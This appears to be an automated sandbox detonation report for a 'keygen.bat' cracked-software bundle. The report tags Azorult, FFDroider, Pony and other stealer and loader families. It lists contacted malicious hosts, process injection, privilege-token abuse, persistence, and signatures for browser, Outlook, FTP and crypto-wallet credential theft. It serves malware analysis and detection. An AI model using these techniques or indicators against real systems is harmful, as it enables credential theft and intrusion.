GB 89.116.109.163:443 evaexpand.com tcp
GB 89.116.109.163:443 evaexpand.com tcp
GB 89.116.109.163:443 evaexpand.com tcp
GB 89.116.109.163:443 evaexpand.com tcp
GB 89.116.109.163:443 evaexpand.com tcp
GB 89.116.109.163:443 evaexpand.com tcp
US 8.8.8.8:53 evaexpand.com udp
GB 89.116.109.30:443 evaexpand.com tcp
GB 89.116.109.30:443 evaexpand.com tcp
GB 89.116.109.30:443 evaexpand.com tcp
GB 89.116.109.30:443 evaexpand.com tcp
US 8.8.8.8:53 evaexpand.com udp
GB 89.116.109.163:443 evaexpand.com tcp
GB 89.116.109.163:443 evaexpand.com tcp
GB 89.116.109.163:443 evaexpand.com tcp
GB 89.116.109.163:443 evaexpand.com tcp
GB 89.116.109.163:443 evaexpand.com tcp
GB 89.116.109.163:443 evaexpand.com tcp
GB 89.116.109.163:443 evaexpand.com tcp
US 8.8.8.8:53 evaexpand.com udp
GB 89.116.109.163:443 evaexpand.com tcp
GB 89.116.109.163:443 evaexpand.com tcp
GB 89.116.109.163:443 evaexpand.com tcp
GB 89.116.109.163:443 evaexpand.com tcp
US 8.8.8.8:53 evaexpand.com udp
GB 89.116.109.163:443 evaexpand.com tcp
GB 89.116.109.163:443 evaexpand.com tcp
GB 89.116.109.163:443 evaexpand.com tcp
GB 89.116.109.163:443 evaexpand.com tcp
GB 89.116.109.163:443 evaexpand.com tcp
GB 89.116.109.163:443 evaexpand.com tcp
GB 89.116.109.163:443 evaexpand.com tcp
US 8.8.8.8:53 evaexpand.com udp
GB 89.116.109.163:443 evaexpand.com tcp
GB 89.116.109.163:443 evaexpand.com tcp
GB 89.116.109.163:443 evaexpand.com tcp
GB 89.116.109.163:443 evaexpand.com tcp
US 8.8.8.8:53 evaexpand.com udp
GB 89.116.109.29:443 evaexpand.com tcp
GB 89.116.109.163:443 evaexpand.com tcp
GB 89.116.109.163:443 evaexpand.com tcp
GB 89.116.109.163:443 evaexpand.com tcp
GB 89.116.109.163:443 evaexpand.com tcp
GB 89.116.109.163:443 evaexpand.com tcp
GB 89.116.109.163:443 evaexpand.com tcp
US 8.8.8.8:53 evaexpand.com udp
GB 89.116.109.163:443 evaexpand.com tcp
GB 89.116.109.163:443 evaexpand.com tcp
GB 89.116.109.163:443 evaexpand.com tcp
GB 89.116.109.163:443 evaexpand.com tcp
US 8.8.8.8:53 evaexpand.com udp
GB 89.116.109.163:443 evaexpand.com tcp
US 104.26.2.46:443 iplogger.org tcp
GB 89.116.109.163:443 evaexpand.com tcp
GB 89.116.109.163:443 evaexpand.com tcp
GB 89.116.109.163:443 evaexpand.com tcp
GB 89.116.109.163:443 evaexpand.com tcp
GB 89.116.109.163:443 evaexpand.com tcp
GB 89.116.109.163:443 evaexpand.com tcp
US 8.8.8.8:53 evaexpand.com udp
GB 89.116.109.163:443 evaexpand.com tcp
GB 89.116.109.163:443 evaexpand.com tcp
GB 89.116.109.163:443 evaexpand.com tcp
GB 89.116.109.163:443 evaexpand.com tcp
US 8.8.8.8:53 evaexpand.com udp
GB 89.116.109.163:443 evaexpand.com tcp
US 8.8.8.8:53 crl.microsoft.com udp
GB 2.19.117.22:80 crl.microsoft.com tcp

Files

memory/2192-0-0x00000000000F0000-0x0000000000108000-memory.dmp

Analysis: behavioral12

Detonation Overview

Submitted

2024-11-08 22:29

Reported

2024-11-08 22:32

Platform

win10v2004-20241007-en

Max time kernel

149s

Max time network

151s

Command Line

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\keygen.bat"

Signatures

Azorult

trojan infostealer azorult

Azorult family

azorult

Detect Fabookie payload

Description Indicator Process Target
N/A N/A N/A N/A

FFDroider

stealer ffdroider

FFDroider payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Fabookie

spyware stealer fabookie

Fabookie family

fabookie

Ffdroider family

ffdroider

GCleaner

loader gcleaner

Gcleaner family

gcleaner

OnlyLogger

loader onlylogger

Onlylogger family

onlylogger

Pony family

pony

Pony,Fareit

rat spyware stealer pony

OnlyLogger payload

Description Indicator Process Target
N/A N/A N/A N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\chrome3.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Roaming\services64.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\RarSFX1\Crack.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\RarSFX1\PBrowFile28.exe N/A

Reads data files stored by FTP clients

spyware stealer

Reads user/profile data of web browsers

spyware stealer

Unsecured Credentials: Credentials In Files

credential_access stealer

Accesses Microsoft Outlook accounts

collection
Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts C:\Users\Admin\AppData\Local\Temp\RarSFX0\key.exe N/A

Accesses Microsoft Outlook profiles

collection
Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook C:\Users\Admin\AppData\Local\Temp\RarSFX0\key.exe N/A

Accesses cryptocurrency files/wallets, possible credential harvesting

spyware

Checks installed software on the system

discovery

Checks whether UAC is enabled

evasion trojan
Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA C:\Users\Admin\AppData\Local\Temp\RarSFX1\md1_1eaf.exe N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A iplogger.org N/A N/A
N/A iplogger.org N/A N/A
N/A raw.githubusercontent.com N/A N/A
N/A raw.githubusercontent.com N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A iplogger.org N/A N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A ip-api.com N/A N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 4508 set thread context of 2288 N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\key.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\key.exe
PID 4492 set thread context of 3192 N/A C:\Users\Admin\AppData\Roaming\services64.exe C:\Windows\explorer.exe

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\winnetdriv.exe C:\Users\Admin\AppData\Local\Temp\keygen-step-3.exe N/A
File opened for modification C:\Windows\winnetdriv.exe C:\Users\Admin\AppData\Local\Temp\keygen-step-3.exe N/A

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\keygen-step-1.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\keygen-pr.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\keygen-step-3.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\RarSFX1\PBrowFile28.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\RarSFX1\md1_1eaf.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\PING.EXE N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\RarSFX1\f2217e5f.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\keygen-step-4.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\RarSFX1\Crack.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\RarSFX0\key.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\RarSFX1\Crack.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\setup.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\RarSFX0\key.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\RarSFX1\Setup.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\keygen-step-6.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\winnetdriv.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A

System Network Configuration Discovery: Internet Connection Discovery

discovery
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A

Checks SCSI registry key(s)

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\RarSFX1\f2217e5f.exe N/A
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\RarSFX1\f2217e5f.exe N/A
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\RarSFX1\f2217e5f.exe N/A

Runs ping.exe

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A

Scheduled Task/Job: Scheduled Task

persistence execution
Description Indicator Process Target
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\key.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\key.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\chrome3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\chrome3.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\services64.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\services64.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\2.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\PublicDwlBrowser188.exe N/A
Token: SeImpersonatePrivilege N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\key.exe N/A
Token: SeTcbPrivilege N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\key.exe N/A
Token: SeChangeNotifyPrivilege N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\key.exe N/A
Token: SeCreateTokenPrivilege N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\key.exe N/A
Token: SeBackupPrivilege N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\key.exe N/A
Token: SeRestorePrivilege N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\key.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\key.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\key.exe N/A
Token: SeImpersonatePrivilege N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\key.exe N/A
Token: SeTcbPrivilege N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\key.exe N/A
Token: SeChangeNotifyPrivilege N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\key.exe N/A
Token: SeCreateTokenPrivilege N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\key.exe N/A
Token: SeBackupPrivilege N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\key.exe N/A
Token: SeRestorePrivilege N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\key.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\key.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\key.exe N/A
Token: SeImpersonatePrivilege N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\key.exe N/A
Token: SeTcbPrivilege N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\key.exe N/A
Token: SeChangeNotifyPrivilege N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\key.exe N/A
Token: SeCreateTokenPrivilege N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\key.exe N/A
Token: SeBackupPrivilege N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\key.exe N/A
Token: SeRestorePrivilege N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\key.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\key.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\key.exe N/A
Token: SeImpersonatePrivilege N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\key.exe N/A
Token: SeTcbPrivilege N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\key.exe N/A
Token: SeChangeNotifyPrivilege N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\key.exe N/A
Token: SeCreateTokenPrivilege N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\key.exe N/A
Token: SeBackupPrivilege N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\key.exe N/A
Token: SeRestorePrivilege N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\key.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\key.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\key.exe N/A
Token: SeImpersonatePrivilege N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\key.exe N/A
Token: SeTcbPrivilege N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\key.exe N/A
Token: SeChangeNotifyPrivilege N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\key.exe N/A
Token: SeCreateTokenPrivilege N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\key.exe N/A
Token: SeBackupPrivilege N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\key.exe N/A
Token: SeRestorePrivilege N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\key.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\key.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\key.exe N/A
Token: SeImpersonatePrivilege N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\key.exe N/A
Token: SeTcbPrivilege N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\key.exe N/A
Token: SeChangeNotifyPrivilege N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\key.exe N/A
Token: SeCreateTokenPrivilege N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\key.exe N/A
Token: SeBackupPrivilege N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\key.exe N/A
Token: SeRestorePrivilege N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\key.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\key.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\key.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\chrome3.exe N/A
Token: SeManageVolumePrivilege N/A C:\Users\Admin\AppData\Local\Temp\RarSFX1\md1_1eaf.exe N/A
Token: SeManageVolumePrivilege N/A C:\Users\Admin\AppData\Local\Temp\RarSFX1\md1_1eaf.exe N/A
Token: SeManageVolumePrivilege N/A C:\Users\Admin\AppData\Local\Temp\RarSFX1\md1_1eaf.exe N/A
Token: SeManageVolumePrivilege N/A C:\Users\Admin\AppData\Local\Temp\RarSFX1\md1_1eaf.exe N/A
Token: SeManageVolumePrivilege N/A C:\Users\Admin\AppData\Local\Temp\RarSFX1\md1_1eaf.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\RarSFX1\ss.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Roaming\services64.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Windows\explorer.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Windows\explorer.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\RarSFX1\Setup.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3080 wrote to memory of 2340 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\keygen-pr.exe
PID 3080 wrote to memory of 2340 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\keygen-pr.exe
PID 3080 wrote to memory of 2340 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\keygen-pr.exe
PID 3080 wrote to memory of 720 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\keygen-step-1.exe
PID 3080 wrote to memory of 720 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\keygen-step-1.exe
PID 3080 wrote to memory of 720 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\keygen-step-1.exe
PID 3080 wrote to memory of 2788 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\keygen-step-6.exe
PID 3080 wrote to memory of 2788 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\keygen-step-6.exe
PID 3080 wrote to memory of 2788 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\keygen-step-6.exe
PID 3080 wrote to memory of 3092 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\keygen-step-3.exe
PID 3080 wrote to memory of 3092 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\keygen-step-3.exe
PID 3080 wrote to memory of 3092 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\keygen-step-3.exe
PID 3092 wrote to memory of 212 N/A C:\Users\Admin\AppData\Local\Temp\keygen-step-3.exe C:\Windows\winnetdriv.exe
PID 3092 wrote to memory of 212 N/A C:\Users\Admin\AppData\Local\Temp\keygen-step-3.exe C:\Windows\winnetdriv.exe
PID 3092 wrote to memory of 212 N/A C:\Users\Admin\AppData\Local\Temp\keygen-step-3.exe C:\Windows\winnetdriv.exe
PID 3080 wrote to memory of 1476 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\keygen-step-4.exe
PID 3080 wrote to memory of 1476 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\keygen-step-4.exe
PID 3080 wrote to memory of 1476 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\keygen-step-4.exe
PID 2340 wrote to memory of 4508 N/A C:\Users\Admin\AppData\Local\Temp\keygen-pr.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\key.exe
PID 2340 wrote to memory of 4508 N/A C:\Users\Admin\AppData\Local\Temp\keygen-pr.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\key.exe
PID 2340 wrote to memory of 4508 N/A C:\Users\Admin\AppData\Local\Temp\keygen-pr.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\key.exe
PID 1476 wrote to memory of 2112 N/A C:\Users\Admin\AppData\Local\Temp\keygen-step-4.exe C:\Users\Admin\AppData\Local\Temp\RarSFX1\Crack.exe
PID 1476 wrote to memory of 2112 N/A C:\Users\Admin\AppData\Local\Temp\keygen-step-4.exe C:\Users\Admin\AppData\Local\Temp\RarSFX1\Crack.exe
PID 1476 wrote to memory of 2112 N/A C:\Users\Admin\AppData\Local\Temp\keygen-step-4.exe C:\Users\Admin\AppData\Local\Temp\RarSFX1\Crack.exe
PID 4508 wrote to memory of 2288 N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\key.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\key.exe
PID 4508 wrote to memory of 2288 N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\key.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\key.exe
PID 4508 wrote to memory of 2288 N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\key.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\key.exe
PID 4508 wrote to memory of 2288 N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\key.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\key.exe
PID 4508 wrote to memory of 2288 N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\key.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\key.exe
PID 4508 wrote to memory of 2288 N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\key.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\key.exe
PID 4508 wrote to memory of 2288 N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\key.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\key.exe
PID 4508 wrote to memory of 2288 N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\key.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\key.exe
PID 4508 wrote to memory of 2288 N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\key.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\key.exe
PID 4508 wrote to memory of 2288 N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\key.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\key.exe
PID 4508 wrote to memory of 2288 N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\key.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\key.exe
PID 4508 wrote to memory of 2288 N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\key.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\key.exe
PID 4508 wrote to memory of 2288 N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\key.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\key.exe
PID 4508 wrote to memory of 2288 N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\key.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\key.exe
PID 4508 wrote to memory of 2288 N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\key.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\key.exe
PID 2112 wrote to memory of 4808 N/A C:\Users\Admin\AppData\Local\Temp\RarSFX1\Crack.exe C:\Users\Admin\AppData\Local\Temp\RarSFX1\Crack.exe
PID 2112 wrote to memory of 4808 N/A C:\Users\Admin\AppData\Local\Temp\RarSFX1\Crack.exe C:\Users\Admin\AppData\Local\Temp\RarSFX1\Crack.exe
PID 2112 wrote to memory of 4808 N/A C:\Users\Admin\AppData\Local\Temp\RarSFX1\Crack.exe C:\Users\Admin\AppData\Local\Temp\RarSFX1\Crack.exe
PID 1476 wrote to memory of 4644 N/A C:\Users\Admin\AppData\Local\Temp\keygen-step-4.exe C:\Users\Admin\AppData\Local\Temp\RarSFX1\PBrowFile28.exe
PID 1476 wrote to memory of 4644 N/A C:\Users\Admin\AppData\Local\Temp\keygen-step-4.exe C:\Users\Admin\AppData\Local\Temp\RarSFX1\PBrowFile28.exe
PID 1476 wrote to memory of 4644 N/A C:\Users\Admin\AppData\Local\Temp\keygen-step-4.exe C:\Users\Admin\AppData\Local\Temp\RarSFX1\PBrowFile28.exe
PID 4644 wrote to memory of 2660 N/A C:\Users\Admin\AppData\Local\Temp\RarSFX1\PBrowFile28.exe C:\Users\Admin\AppData\Local\Temp\chrome3.exe
PID 4644 wrote to memory of 2660 N/A C:\Users\Admin\AppData\Local\Temp\RarSFX1\PBrowFile28.exe C:\Users\Admin\AppData\Local\Temp\chrome3.exe
PID 4644 wrote to memory of 2292 N/A C:\Users\Admin\AppData\Local\Temp\RarSFX1\PBrowFile28.exe C:\Users\Admin\AppData\Local\Temp\PublicDwlBrowser188.exe
PID 4644 wrote to memory of 2292 N/A C:\Users\Admin\AppData\Local\Temp\RarSFX1\PBrowFile28.exe C:\Users\Admin\AppData\Local\Temp\PublicDwlBrowser188.exe
PID 4644 wrote to memory of 3592 N/A C:\Users\Admin\AppData\Local\Temp\RarSFX1\PBrowFile28.exe C:\Users\Admin\AppData\Local\Temp\2.exe
PID 4644 wrote to memory of 3592 N/A C:\Users\Admin\AppData\Local\Temp\RarSFX1\PBrowFile28.exe C:\Users\Admin\AppData\Local\Temp\2.exe
PID 4644 wrote to memory of 4388 N/A C:\Users\Admin\AppData\Local\Temp\RarSFX1\PBrowFile28.exe C:\Users\Admin\AppData\Local\Temp\setup.exe
PID 4644 wrote to memory of 4388 N/A C:\Users\Admin\AppData\Local\Temp\RarSFX1\PBrowFile28.exe C:\Users\Admin\AppData\Local\Temp\setup.exe
PID 4644 wrote to memory of 4388 N/A C:\Users\Admin\AppData\Local\Temp\RarSFX1\PBrowFile28.exe C:\Users\Admin\AppData\Local\Temp\setup.exe
PID 4644 wrote to memory of 2756 N/A C:\Users\Admin\AppData\Local\Temp\RarSFX1\PBrowFile28.exe C:\Users\Admin\AppData\Local\Temp\jhuuee.exe
PID 4644 wrote to memory of 2756 N/A C:\Users\Admin\AppData\Local\Temp\RarSFX1\PBrowFile28.exe C:\Users\Admin\AppData\Local\Temp\jhuuee.exe
PID 2788 wrote to memory of 2716 N/A C:\Users\Admin\AppData\Local\Temp\keygen-step-6.exe C:\Windows\SysWOW64\cmd.exe
PID 2788 wrote to memory of 2716 N/A C:\Users\Admin\AppData\Local\Temp\keygen-step-6.exe C:\Windows\SysWOW64\cmd.exe
PID 2788 wrote to memory of 2716 N/A C:\Users\Admin\AppData\Local\Temp\keygen-step-6.exe C:\Windows\SysWOW64\cmd.exe
